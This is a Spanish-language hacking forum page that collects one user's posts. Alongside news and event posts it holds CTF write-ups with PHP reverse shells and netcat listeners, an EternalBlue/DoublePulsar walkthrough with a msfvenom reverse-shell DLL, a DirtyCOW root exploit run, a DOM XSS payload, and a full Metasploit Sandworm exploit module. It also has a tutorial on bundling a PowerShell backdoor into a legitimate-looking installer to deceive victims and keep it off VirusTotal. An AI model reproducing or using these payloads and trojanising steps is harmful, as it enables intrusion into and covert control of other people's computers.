Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Stuxnet

#1

Hola underc0de xD después de años sin publicar nada :v espero que no lo tomen como spam :3


La plataforma desarrolla aulas virtuales que no solo permiten a los usuarios implementar entornos de formación con solo hacer clic en un botón, sino también reforzar el aprendizaje mediante la adición de un enfoque de preguntas y respuestas. Es una experiencia cómoda para aprender mediante cursos prediseñados que incluyen máquinas virtuales (VM) hospedadas en la nube.

Mientras que el uso de un modelo de preguntas-respuesta hace que el aprendizaje sea más fácil, TryHackMe permite a los usuarios crear sus propias aulas virtuales para enseñar temas particulares que les permiten convertirse en profesores. Esto no sólo proporciona a otros usuarios contenido rico y variado, sino que también ayuda a los creadores a reforzar su comprensión de los conceptos fundamentales.

TryHackMe es muy adecuado para cualquier tipo de CTF, talleres y evaluaciones de formación, la plataforma está siendo utilizada por un concurso de la Universidad del Reino Unido llamado "HackBack", sólo una de las 12 universidades diferentes que TryHackMe ha participado!

Los concursos se centran en varias categorías de seguridad, entre ellas:


  • Explotación Web
    Forense
    OSINT
    Scripting
    Redes
    Ingeniería inversa

Algunas organizaciones privadas están utilizando la plataforma para evaluar a los entrevistados sobre su capacidad y para ayudarles a poner en la lista blanca a los empleados potenciales.

Completar las salas contribuye a completar "Objetivos", que son objetivos establecidos por TryHackMe. Por ejemplo, algunas salas pueden ayudar a prepararse para el examen OSCP.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Porque tryhackme y no hack the box (Que es otra excelente opción) Pues como menciono en el post lo que busca es que usuarios nuevos aprendan desde lo basico.


PD: Un saludo para todo los que conocen ): los extraño ..... xD
#2
Off Topic / Ekoparty
Septiembre 24, 2017, 02:07:56 PM
Bien, este año me ire para la eko, asi que por si alguien más va y se pueda cuadrar un almuerzo o algunos retos sería perfecto.

telegram: @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un saludo.

#3

En este tutorial vamos a resolver la maquina virtual hackfest2016: Quaoar la cual la pueden descargar desde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Viendo la descripción de la maquina virtual pide que encontremos 3 flags.

Código: text
There are 3 flags on this machine 

1. Get a shell
2. Get root access
3. There is a post exploitation flag on the box


Código: text
Laboratorio:
Atacante Kali: 192.168.1.100
Victima Quaoar: 192.168.1.101


Escaneo:


Como vemos tenemos un apache corriendo en el 80.


Buscando directorios con nmap


Genial tenemos un wordpress. Ahora le pasare un scanner conocido como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Al poco tiempo del scaneo nos mostrará que el sitio esta utilizando contraseñas por defecto que serian admin:admin así que vamos a omitir cualquier explotación de vulnerabilidades web y obtendremos acceso al equipo mediante una reverse shell en php.

Ingresando al administrador del blog

Código: text
user: admin
password:admin


Una vez echo esto, nos vamos al appearance --> editor  --> 404.php, la página 404 es la que tendra la reverse shell que voy a utilizar que será una de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.


Procedemos a modificar la reverse shell.

Código: text
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS


IP Atacante: 192.168.1.100
Por: lo dejare por defecto.

Ahora pondremos a la escucha nuestro netcat

Código: text
nc -v -n -l -p 1234


Al ingresar a la dirección de la página 404 obtendremos acceso al sistema, la url seria No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. twentyfourteen es el theme que se esta utilizando en el sitio.


Flag: 1. Get a shell


Con el comando locate voy a buscar el archivo flag.txt, al hacer eso nos dice que se encuentra en la carpeta /home/wpadmin/, después solo vere su contenido con el comando cat.

Flag 2. Get root access

Como el sitio esta en wordpress se me ocurrio hacerle un cat al archivo wp-config.php muchas veces colocan por ahi la password root


Genial la contraseña es: rootpassword!

Ahora voy a obtener una bash con el siguiente comando.

Código: text
python -c 'import pty;pty.spawn("/bin/bash")'



Yeaaa! como podemos ver, en la carpeta root se encuentra la segunda flag.

Flag 3. There is a post exploitation flag on the box.

Sin duda esta fué la que me tomo más tiempo, para encontra esta flag utilice de recurso No tienes permitido ver los links. Registrarse o Entrar a mi cuenta después de un rato leyendo el repositorio hago un cat sobre  /etc/crontab

Código: text
Crontab es un simple archivo de texto que guarda una lista de comandos a ejecutar en un tiempo especificado por el usuario



Nada de flag ):, ahora me iré a ver la carperta cron.d en el directorio etc.


Fuck yea! Al hacerle un cat al archivo php5 que se encontraba en la carpeta nos arroja información y un texto md5 cual es la ultima flag.
#4
Wargames y retos / DevelReto
Junio 18, 2017, 01:33:25 PM
Hola comunidad aquí les dejo un pequeño reto que acabo de hacer, espero se diviertan esta muy entretenido, cualquier duda me hablan por mensaje. Y la solución me la envian por privado saludos.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#5
Hacking / Hackeando como la nsa
Abril 23, 2017, 04:41:28 PM

Buenas en este pequeño post, explotaremos una vulnerabilidad de Ejecución de codigo remoto en smb de windows descubierta por la nsa.
Desde hace unos días el grupo shadowbroker ha liberado nuevos exploits que afectan windows, SWIFT etc.

Las vulnerabilidades en windows son las siguientes:


Requerimientos:

Kali linux - Atacante -- 192.168.1.100
Windows XP - Atacante -- 192.168.1.102
Windows 7  - Victima  -- 192.168.1.101

Fuzzbunch ha sido el nombre de este framework con los multiples exploits de windows "El mestasploit de la nsa". Programado en python 2.6  y utiliza una versión antigua de pywin32.

Montando nuestro laboratorio.

En windows XP instalamos python 2.6 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta recomiendo moficar el path con la ruta de la carpeta de python2.6, la version antigua de pywin32 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y ahora descargamos el leak de exploits. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Nos enfocamos en la carpeta windows y procederemos a modificar Fuzzbunch.xml Linea 19 y linea 24 colocaremos la ruta de la carpeta de Resources en mi caso C:\nsa\shadowbroker\windows\Resources y la de Logs en la 24 C:\nsa\shadowbroker\windows\Logs.

Ahora vamos a editar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta comentando las lineas 26 y 72 o si no quieren comentar unicamente creen una carpeta con el nombre listeningposts dentro de la carpeta windows.

Bien ahora desde cmd nos ubicamos en la carpeta windows y ejecutamos: python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Primero pondremos la Ip victima.
Segundo pondremos la ip atacante windows xp
Tercero pondremos no en redireccion.



Bien despues precionamos enter, y procedemos a crear un proyecto nuevo con el nombre de underc0de.



Bien ahora vamos a usar el comando "use" para ver todo el arsenal de Fuzzbunch



Bien, usaremos el exploit "EternalBlue"



Bien, ahora procedemos a dejar todo por defecto, precionando enter.



Hasta llegar a esta parte donde vamos a cambiar la opcion 0 por 1



Bien ahora seguiremos precionando enter, y si todo salio bien.



Fuuuuuuuuuuuuck yea!!! Exploiting con exito.

Bien ahora usaremos otro genial función de Fuzzbunch DoublePulsar, para inyectar remotamente una DLL maliciosa, para eso la vamos a generar con msfvenom.

Código: text
msfvenom --platform Windows -p windows/meterpreter/reverse_tcp --arch x86 -f dll LHOST=192.168.1.100 LPORT=4444 > /root/nsa.dll 


Nota: La dll se genero para la plataforma de windows x86

Ahora configuramos nuestro handler en metasploit.



Bien ahora copiamos nuestra dll a windows xp y ejecutamos lo siguiente



En mi caso dejare todo por defecto porque tengo la arquitectura x86
Bien ahora en este caso vamos a elejir la opcion 2 y luego nos pedira la ruta de nuestra dll.



Bien ahora, como siempre todo por defecto precionando enter, y si todo salio perfectamente les saldria esto



y en metasploit



fuck yeaaa!!! Sesion meterpreter sobre windows sin intervencion del usuario.

Recomendaciones.

Actualizar su sistema.
#6

Hace unos dias el investigador Phil Oester dio a conocer la vulnerabilidad No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) la cual nos permite elevar privilegios en sistemas linux en otras palabras, un usuario local sin privilegios podría utilizar esta vulnerabilidad para escribir y tener acceso a partes del sistema que son de otros usuarios, incluido el root.


Ya existe un exploit público en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para poder explotar dicha aprovecha. Aparte en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta se ha montado un repositorio sobre todas las pruebas de concepto. 

PoC: Exploit DirtyCOW (Ubuntu 14.04 y Ubuntu 15.10)

Comprobación de versión del Kernel con el comando uname -a

Ubuntu 14.04

Ubuntu 15.10


Una vez descargado el exploit procedemos a comentar el payload generado con msfvenom, si estamos en un sistema x86, debemos comentar el payload  para x64 y si nos encontramos en un sistema x64 seria al revés.


Compilando el exploit, esta escrito en C.

Código: text
gcc 40616.c -o 40616 -pthread


Ahora ejecutamos.

Código: text
./40616


Elevación a usuario root en Ubuntu 14.04

Elevación a usuario root en Ubuntu 15.10

Bytes:3
#7
Soluciones de Wargames / Completando CTF Mr. Robot
Agosto 30, 2016, 02:23:38 AM

Hola, hace tiempos sin postear nada y vi que cnfs realizo write-up de un ctf, haré lo mismo un pequeño reto que me colocaron en la empresa sin poder utilizar metasploit :c ok, el cual me saco las canas verdes un rato.

Mr. Robot CTF: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

  • Comenzando, hice un simple escaneo a la dirección 192.168.1.101 donde lo tengo montado.



    Como vemos el puerto 80 y el 443 están abiertos y el 22 cerrado.

    Entramos a la direccion de la maquina victima, y nos mostrava esto :c sin links así que 0 vul que testear xD :c



    Lo siguiente que realize fué buscar arhivos en el servidor para esto utilize la herramienta dirb, después de un rato de espera tenemos resultado

    Genial un wordpress :3



  • y los robots.txt



    Primero le veremos los robots.txt



    Genial, tenemos la 1 key de 3 :3 aparte de esto hay un diccionario que nos servira mucho :3

    Como ya se que es un wordpress utilizare la herramienta CMSmap :3 para ver si tiene algun fallo ha explotar



    No fué mucho lo que obtuve :c solo esta parte intersante el cual nos permitia enumerar usuarios a través de un forgotten password.

  • Enumerando Usuarios.

    Para esto vamos a usar el diccionario que encontramos en robots.txt haciendo un poco de fuzzing con zap

    Zed Attack Proxy (ZAP) es una herramienta proveniente del Proyecto OWASP para realizar tests de penetración en aplicaciones web.
    Zap ya esta incluida por defecto en Kali Linux asi que solo basta con ejectutar en consola zaproxy en consola. Ahora configuramos nuestro proxy nuestro navegador.

    Nuestro ataque será dirigido hacía la ruta 192.168.1.101/wp-login
    Login: Devel
    Password: develsecurity



    Nos devuelve la siguiente respuesta en el zaproxy, seleccionamos la respuesta que sería devel, click derecho y seleccionamos la opción de fuzz.
    Para realizar la opción de fuzz utilizare un diccionario de robots.txt.



    Seleccionamos Añadir, y luego Start Fuzzer

    Al revisar la respuesta claramente nos dice que el usuario es invalido.



    Como vemos nos marca con un Reflected, y revisando la respuesta nos damos cuenta que nos dice contraseña invalida para el usuario Elliot. Hemos encontrado nuestro usuario.



  • Ataque de Fuerza Bruta.

    Siempre utilizando el diccionario y cmsmap haré un ataque de fuerza bruta, solo que ahora para ahorra tiempo lo acortaremos un poco con la herramienta sort de la siguiente manera. (Gracias a cierto miembro de la empresa por el tip)

    cat fsocity.dic | wc -l
    sort -u fsocity.dic | wc -l
    sort -u fsocity.dic > fsocity.small.dic

    Ahora utilizamos CMSmap.



    -u = El nombre de usario en nuestro caso sería Elliot
    -p = passwords, el path de nuestro wordlist.
    Listo luego de un tiempo CMSmap completa su trabajo.

    Ahora utilizando las credenciales obtenidas:




    Listo estamos dentro, :3 ahora solo falta tener un shell inversa en el host :c jaja como regla era no usar metasploit así que me recorde que anteriores ctf un amigo me recomendo shells de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

    Así que descargamos y configuramos

    $ip = '127.0.0.1';  // CHANGE THIS (IP Atacante en nuestro caso 192.168.1.100)
    $port = 1234;       // CHANGE THIS

    y en consola pondremos a la escucha netcat: nc -v -n -l -p 1234

    Ahora vamos a editar la página de error 404 copiando el codigo de nuestra shell :3



    Ahora ingresamos a la direccion de nuestra shell No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



    Listo :3 estamos dentro ahora solo nos movemos para el /home/robot



    :C bueno aqui fué la parte donde me salieron canas verdes, necesitava una terminal :c contacte con quien me recomendo la php shell y me dijo que en la misma página se encontraba esto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta , asi que para llamar a la terminal utilizare python -c 'import pty; pty.spawn("/bin/sh")'



    :3 listo tenemos nuestra terminal :3 pero el problema sigue, la key 2 pertenese al usuario robot y nosotros estamos como daemon, pero hay otro archivo intresante el password.raw-md5



    robot:c3fcd3d76192e4007dfb496cca67e13b

    Usuario y contraseña como vemos es un md5 y si lo colocamos en google :3 abcdefghijklmnopqrstuvwxyz , ahora ejecutamos su robot



    Ahora si podemos hacer un cat de la segunda key :3



    solo una mas y pwned, para lo siguiente un par de cervezas y cigarros xD, el ultimo flag no lo pude resolver, no encontre como elevar privilegios :c. Les dare la solución que hizo un miembro de la empreza, primero ejecuta nmap, al ver que este estava instalado uso la opción --interactive y luego ejecuto !sh,

    Esta opción nos permite ejecutar una terminal como root y bum key 3 :3



    Agradecimiento al team DevelSecurity.

#8
Hacking / Atacando Windows 8.1 Pro con Harness
Diciembre 20, 2015, 08:45:58 PM

Saludos amigos en este pequeño tutorial atacaremos un sistema windows 8.1 x86 con la herramienta harness.


Harness fue presentada en la DEFCON23 esta tool nos permite generar payload de acceso remoto con la capacidad de proporcioanar una interfaz de control remoto de powershell.

Vamos a ello.

Clonamos el proyecto desde Github

Código: php
git clone https://github.com/rich5/Harness


Para la instalacion de la herramienta ejecutaremos los siguientes comandos.

Código: php
cd Harness
chmod 755 python_install.sh
./python_install.sh


Código: php
wget http://python.org/ftp/python/3.4.3/Python-3.4.3.tar.xz
tar xf Python-3.4.3.tar.xz
cd Python-3.4.3
./configure --prefix=/usr/local --enable-shared LDFLAGS="-Wl,-rpath /usr/local/lib"
make && make altinstall



Tambien se ha corregido el bug con el autocompletado, para eso ejecuta los siguientes comando

Código: php
apt-get install libssl-dev openssl
apt-get install python3-pip
apt-get install libcurses5-dev
pip3 install readline
python_install.sh


Ahora si stuxnet atack !!! xD

Ejecutamos harness de la siguiente manera

Código: php
python3.4 harness.py



Ahora listaremos los módulos de la tool de la siguiente manera

Código: php
show modules



En este caso usare el ultimo payload ya que el windows que atacare es x86, para eso lo cargaremos de la siguiente manera.

Código: php
load payloads/TCP/x86/exe/Harness_x86


y para ver sus opciones

Código: php
show options



Ahora procederemos a configurarlo, IP = su ip y PORT el puerto que usaran en mi caso usare el 4444


ahora ya configurado todo ejecutamos el comando run y nos preguntara un nombre en mi caso underc0de.exe, se guardara en la carpeta de harness.


Ahora ejecutamos el comando back y procederemos a configurar el handler


Código: php
load handlers/PSHandler


ahora lo procederemos a configurarlo

IP = Su IP
PORT = su puerto
SSL = false


Ahora si ejecutamos run y tendremos en escucha nuestro handler xD ahora es hora de hacer un poco de ingeniería social y les mostrare un pequeño método.


IExpress, creador de instaladores :3

Esta tool es nativa desde windows XP que nos permite crear archivos comprimidos y autoinstaladores.

Para esto utilizaremos cualquier aplicación que deseemos, en mi caso utilizare YUMI una simple tool para crear usb boteables y el backdoor


y ahora el tipico siguiente


En esta parte nos pedirá agregar las dos aplicaciones que deseamos :3


y ahora siguiente y configuramos de la siguiente manera para que el backdoor se ejecute en segundo plano


Luego en siguiente y dejamos esto asi


y le ahora siguiente  nos preguntara donde queremos guardar y luego terminar :3 y se genera nuestro autoinstalador para pasarselo a la victima


Ahora cuando nuestra victima ejecute el programa se abrira la aplicación de YUMI y por debajo el backdoor asi dando nuestra session de powershell !!!!


ahora ejecutamos para ver nuestras sesiones

Código: php
show sessions



Para interactuar con nuestra sesión lo hacemos de la siguiente forma y Fuegoooo en la cocinaa :3 lo que pase después esta en su imaginación.

Código: php
session 1




Nota: No subaan nada a virustotaaal no quemen esta maravillosa herramienta aun en desarrollo

Bytes:

#9

Hace tiempos que no publicaba nada por aquí asi que hoy les vengo hablar un poco sobre OWISAM (Open Wireless Security Assessment Methodology) esta metodología fue presentada en la RootedCON en el año 2013 por Andrés Tarasco y Miguel Tarasco. Es una metodología abierta para el análisis de seguridad Wireless.

La metodología de seguridad OWISAM define un total de 64 controles técnicos, agrupados en 10 categorías, que especifican un conjunto de pruebas necesarias para garantizar con éxito una auditoría de seguridad sobre una infraestructura inalámbrica

El OWISAM Top 10, que define los principales riesgos de seguridad en las redes inalámbricas se ha consolidado y definido:

CitarOWISAM-TR-001: Red de comunicaciones Wi-Fi abierta.
    OWISAM-TR-002: Presencia de cifrado WEP en redes de comunicaciones.
    OWISAM-TR-003: Algoritmo de generación de claves del dispositivo inseguro (contraseñas y WPS).
    OWISAM-TR-004: Clave WEP/WPA/WPA2 basada en diccionario.
    OWISAM-TR-005: Mecanismos de autenticación inseguros (LEAP,PEAP-MD5,..)
    OWISAM-TR-006: Dispositivo con soporte de Wi-Fi protected setup PIN activo (WPS).
    OWISAM-TR-007: Red Wi-Fi no autorizada por la organización.
    OWISAM-TR-008: Portal hotspot inseguro.
    OWISAM-TR-009: Cliente intentando conectar a red insegura.
    OWISAM-TR-010: Rango de cobertura de la red demasiado extenso.

Pueden ver el video de la presentación


Referencias:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#10
Hacking ShowOff / [DOM Based XSS] cybercamp.es
Julio 15, 2015, 11:14:30 AM

url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
vector: ,<img src=x onerror=alert(document.domain)>/
Reportada y fixeada.
#11

En la pasada Hack In The Box Security Conference que se realiza en Amsterdam, el investigador Saumil Shah  presento Stegosploit, la técnica permite a los hackers esconder código malicioso dentro de los píxeles de una imagen.

Cuando se usa la esteganografía en imágenes es probable que la imagen original se vea alterada y esto sea un síntoma de que ha sufrido una modificación. A continuación se  muestra un ejemplo usado por el investigador donde se observa estas alteraciones:


Saumil ha usado una técnica que le permite ocultar el código en aquellos bits menos significativos de los valores RGB de una imagen de forma que las alteraciones producidas al introducir código en ellas son prácticamente imperceptibles.

Demos:




Presentacion:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#12
Hacking / The Pentesters Framework
Junio 08, 2015, 04:14:02 PM

Como siempre Trusred Sec sorprendiendonos con su trabajo, en esta ocación  han liberado un nuevo proyecto llamado The Pentesters Framework, La idea de este framework es reunir una serie de herramientas relacionadas con el pentesting y proporcionar al pentester la posibilidad de tener las herramientas actualizadas y al alcance una serie de comandos.


Este Framework cuenta con modulos para:


Entre sus herramientas podemos encontrar,  beef, sqlmap, Unicorn y MeterSSH, SET entre muchos mas.

Descargamos el proyecto desde git

Código: php
git clone https://github.com/trustedsec/ptf


Para ver sus modulos tecleamos:

Código: php
show modules



Ahora vamos a usar un modulo en mi caso instalare, metershh.

Código: php
use modules/post-exploitation/metershh



Ahora unicamente tecleamos run:


#13
Off Topic / Happy Hack!
Diciembre 23, 2014, 11:16:31 AM

Adelanto el post porque mañana no andare en condiciones muy buenas para hacerlo jajaja xD, asi que todo con moderación.

Les deseo unas felices fiestas en compañía de sus seres queridos, y que su hacking sea de lo mejor xD :3 siempre es bueno hacer una travesura antes de salir a disfrutar.
#14
Hacking / El Cartero llegó a la ekoparty
Octubre 30, 2014, 03:57:00 PM

Como todos sabran en estas fechas se esta celebrando el evento de seguridad informática en latinoamérica, La Ekoparty, el fundador de Section9Labs, Matias P. Brutti, ha mostrado una herramienta de automatización para utilizar en lo que respecta a pruebas de intrusión mediante técnicas de Ingeniería Social. La herramienta, conocida como Cartero, se encarga de hacer envíos de correos adjuntando códigos maliciosos creados con Msfvenom y VeilEvasion; clonado de sitios web para phishing y envío de mensajes de texto.

Esta herramienta es un framework de Ingeniería Social, que cubre la etapa de ataque y explotación de vulnerabilidades. Haciendo uso del envío de correos personalizados, el atacante puede enviar correos electrónicos simulando ser (por ejemplo) un compañero de trabajo dentro de la organización, como también un superior. De esta forma, puede enviar un mensaje solicitando a los empleados que prueben un determinado servicio clonado con la misma herramienta, para producir el robo de esta información.

Según su creador, fue desarrollada solo para plataformas OS X y Linux, lo que significa que no se encuentra disponible para versiones Windows. Sin embargo, resaltó que al ser una aplicación creada en Ruby, podría ejecutarse sin problemas en entornos Windows. Seguido de esto invitó a quienes quieran, a migrarla a la plataforma de Microsoft. En su sitio en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta podrán encontrar las dependencias que la aplicación requiere instalar, junto con las instrucciones para hacerlo.

Referencia:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#15
Off Topic / Feliz Cumple LucaSthefano
Octubre 25, 2014, 11:46:05 AM

Feliz cumple crack, pasatela bien. Disfruta mucho las drogras, la cerveza y las putas xD

Bytes ::)
#16

Una nueva vulnerabilidad reconocida ayer por Microsoft puede permitir la ejecución de códigos remotos. Esta vulnerabilidad, conocida como CVE-2014-6352 aún no ha sido parcheada de forma definitiva, y todas las versiones de Windows (excepto Windows Server 2003) son vulnerables aunque existan work arounds que detallaremos en este post.

Microsoft ha reconocido que ya está al tanto de ataques dirigidos en los cuales atacantes explotan esta vulnerabilidad a través de objetos OLE en presentaciones de Power Point.

La falla está presente en el mecanismo OLE de Windows. OLE, Object Link and Embedding, fue desarrollado por Microsoft y tiene muchas funcionalidades, pero básicamente permite que elementos u objetos de distintos formatos ubicados en distintas rutas sean utilizados por varios programas. Un buen ejemplo es un texto escrito en Word que contiene hojas de cálculo de Excel, figuras y/o fotos, entre otros; que originalmente se encuentran en otras rutas puedan ser accedidas en el texto gracias al hecho de estar incrustados o embebidos en el mismo.

Un atacante tendría que utilizar la Ingeniería Social para convencer la víctima a acceder un sitio específico y hacer clic en un objeto infectado. Es importante destacar que esta vulnerabilidad solamente puede ser explotada si el usuario hace clic en un objeto infectado.

Este es el modulo de metasploit, con el que puden explotar esta vulnerabilidad.

Lo guardan con el nombre de: ms14_060_sandworm.rb y luego lo copian a su carpeta: ruta_metasploit/exploit/windows/fileformat

Código: ruby
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS14-060 Microsoft Windows OLE Package Manager Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
        allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows
        Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be
        vulnerable. However, based on our testing, the most reliable setup is on Windows platforms
        running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such
        as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to
        a failure in the CPackage::CreateTempFileName function.

        This module will generate three files: an INF, a GIF, and a PPSX file. You are required to
        set up a SMB or Samba 3 server and host the INF and GIF there. Systems such as Ubuntu or an
        older version of Winodws (such as XP) work best for this because they require little
        configuration to get going. The PPSX file is what you should send to your target.

        In detail, the vulnerability has to do with how the Object Packager 2 component
        (packager.dll) handles an INF file that contains malicious registry changes, which may be
        leveraged for code execution. First of all, Packager does not load the INF file directly.
        But as an attacker, you can trick it to load your INF anyway by embedding the file path as
        a remote share in an OLE object. The packager will then treat it as a type of media file,
        and load it with the packager!CPackage::OLE2MPlayerReadFromStream function, which will
        download it with a CopyFileW call, save it in a temp folder, and pass that information for
        later. The exploit will do this loading process twice: first for a fake gif file that's
        actually the payload, and the second for the INF file.

        The packager will also look at each OLE object's XML Presentation Command, specifically the
        type and cmd property. In the exploit, "verb" media command type is used, and this triggers
        the packager!CPackage::DoVerb function. Also, "-3" is used as the fake gif file's cmd
        property, and "3" is used for the INF. When the cmd is "-3", DoVerb will bail. But when "3"
        is used (again, for the INF file), it will cause the packager to try to find appropriate
        handler for it, which will end up with C:\Windows\System32\infDefaultInstall.exe, and that
        will install/run the malicious INF file, and finally give us arbitrary code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery
          'sinn3r', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2014-4114'],
          ['OSVDB', '113140'],
          ['MSB', 'MS14-060'],
          ['BID', '70419'],
          ['URL' , 'http://www.isightpartners.com/2014/10/cve-2014-4114/'],
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/'],
          ['URL', 'http://blog.vulnhunt.com/index.php/2014/10/14/cve-2014-4114_sandworm-apt-windows-ole-package-inf-arbitrary-code-execution/']
        ],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          ['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Oct 14 2014",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']),
        OptString.new('UNCPATH', [ true, 'The UNC folder to use (Ex: \\\\192.168.1.1\\share)' ])
      ], self.class)
  end

  def exploit
    @unc = validate_unc_path

    if @unc.nil?
      fail_with(Failure::BadConfig, "UNCPATH must be a remote shared folder")
    end

    print_status("Creating the EXE payload...")
    payload_name = "#{rand_text_alpha(4)}.gif"
    p = generate_payload_exe

    print_status("Creating the INF file...")
    inf_name = "#{rand_text_alpha(4)}.inf"
    inf = inf_file(payload_name)

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    exe_stream = ole_exe(payload_name)
    inf_stream = ole_inf(inf_name)
    zip = zip_ppsx(exe_stream, inf_stream)
    file_create(zip)

    payload_path = my_file_create(p, payload_name)
    print_good("#{payload_name} stored at #{payload_path}, copy it to the remote share: #{@unc}")

    inf_path = my_file_create(inf, inf_name)
    print_good("#{inf_name} stored at #{inf_path}, copy it to the remote share: #{@unc}")
  end

  def validate_unc_path
    if datastore['UNCPATH'] =~ /^\\{2}[[:print:]]+\\[[:print:]]+\\*$/
      unc = datastore['UNCPATH']
    else
      unc = nil
    end

    unc
  end

  def my_file_create(data, name)
    ltype = "exploit.fileformat.#{self.shortname}"
    path = store_local(ltype, nil, data, name)

    path
  end

  def zip_ppsx(ole_exe, ole_inf)
    zip_data = {}
    data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template')

    Dir["#{data_dir}/**/**"].each do |file|
      unless File.directory?(file)
        zip_data[file.sub(data_dir,'')] = File.read(file)
      end
    end

    # add the otherwise skipped "hidden" file
    file = "#{data_dir}/_rels/.rels"
    zip_data[file.sub(data_dir,'')] = File.read(file)

    # put our own OLE streams
    zip_data['/ppt/embeddings/oleObject1.bin'] = ole_exe
    zip_data['/ppt/embeddings/oleObject2.bin'] = ole_inf

    # create the ppsx
    ppsx = Rex::Zip::Archive.new
    zip_data.each_pair do |k,v|
      ppsx.add_file(k,v)
    end

    ppsx.pack
  end

  def ole_inf(file_name)
    content = "EmbeddedStg2.txt\x00"
    content << "#{@unc}\\#{file_name}\x00"

    data = [content.length].pack('V')
    data << content
    ole = create_ole("\x01OLE10Native", data)

    ole
  end

  def ole_exe(file_name)
    content = "EmbeddedStg1.txt\x00"
    content << "#{@unc}\\#{file_name}\x00"

    data = [content.length].pack('V')
    data << content

    ole = create_ole("\x01OLE10Native", data)

    ole
  end

  def create_ole(stream_name, data)
    ole_tmp = Rex::Quickfile.new('ole')
    stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)

    stm = stg.create_stream(stream_name)
    stm << data
    stm.close

    directory = stg.instance_variable_get(:@directory)
    directory.each_entry do |entry|
      if entry.instance_variable_get(:@_ab) == 'Root Entry'
        # 02260200-0000-0000-c000-000000000046 # Video clip
        clsid = Rex::OLE::CLSID.new("\x02\x26\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
        entry.instance_variable_set(:@_clsId, clsid)
      end
    end

    # write to disk
    stg.close

    ole_contents = File.read(ole_tmp.path)
    ole_tmp.close
    ole_tmp.unlink

    ole_contents
  end

  def inf_file(gif_name)
    inf = <<-EOF
; 61883.INF
; Copyright (c) Microsoft Corporation.  All rights reserved.

[Version]
Signature = "$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
Provider=%Msft%
DriverVer=06/21/2006,6.1.7600.16385

[DestinationDirs]
DefaultDestDir = 1

[DefaultInstall]
RenFiles = RxRename
AddReg = RxStart

[RxRename]
#{gif_name}.exe, #{gif_name}
[RxStart]#
HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\#{gif_name}.exe
EOF

    inf
  end

end


Fuente:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#17
Hacking / OWASP Testing Guide
Octubre 21, 2014, 10:40:00 PM

El marco de trabajo descrito en este documento pretende alentar a las personas a evaluar y tomar una medida de la seguridad a través de todo el proceso de desarrollo. Así, pueden relacionar los costes de un software inseguro al impacto que tiene en su negocio, y de este modo gestionar decisiones de negocio apropiadas (recursos) para la gestión del riesgo.

El software inseguro tiene de por si sus consecuencias, pero las aplicaciones web inseguras, expuestas a millones de usuarios a través de Internet, representan una inquietud creciente. Incluso a día de hoy, la confianza de los clientes que usan la Web para realizar sus compras o cubrir sus necesidades de información está decreciendo, a medida que más y más aplicaciones web se ven expuestas a ataques.

Han pasado ya 6 años desde la última versión estable de la Guía de pruebas OWASP, la v3.

PDF:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

